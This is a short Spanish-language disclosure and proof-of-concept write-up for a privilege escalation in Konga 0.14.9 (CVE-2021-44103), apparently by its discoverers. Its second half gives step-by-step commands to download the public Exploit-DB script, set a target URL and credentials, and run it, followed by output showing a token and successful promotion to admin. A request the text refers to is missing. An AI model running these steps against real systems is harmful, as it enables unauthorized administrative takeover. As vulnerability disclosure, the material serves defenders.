
Una prueba de concepto para KONGA 0.14.9 - Escalada de privilegios.
El 16 de noviembre de 2021, Fabrício Salomão y yo encontramos una vulnerabilidad en las puertas de enlace de la API de Konga, que permitía a cualquier usuario autenticado convertirse en administrador.
Producto: KONGA
Modelo: 0.14.9
Vulnerabilidad: Escalada de privilegios
Impacto: Acceso total de administrador (escalada vertical de privilegios)
Autenticación: requerida
Autor del exploit: Fabricio Salomao / Paulo Trindade
A continuación, se creó un usuario normal llamado "usernormal" sin privilegios.


Mediante la solicitud que se muestra a continuación, se cambió el indicador "FALSE" en el parámetro "admin" a "TRUE".

Por lo tanto, se creó un exploit para nosotros: https://www.exploit-db.com/exploits/50521

Después de ejecutar el exploit, ¡la escalada de privilegios fue un éxito!
Resultado:

wget https://www.exploit-db.com/raw/50521 -O 50521.py
Edit 50521.py
Modify:
urlkonga = "http://www.example.com:1337/" # change to your konga address
identifier = "usernormalkonga" # change user
password = "changeme" # change password
Execute:
python 50521.py
[+] Attack
[+] Token eyJhbGciOiJIUzI1NiJ9.MTA.JFmJ0Vd3z5oeOTokSL0qfPZSOJmnZKEjZVzCJs_AM-U
[+] Change Normal User to Admin
[+] Success
http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html
https://www.exploit-db.com/exploits/50521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44103
https://github.com/advisories/GHSA-f2mp-8fgg-7465
https://security.snyk.io/vuln/SNYK-JS-KONGA-2434821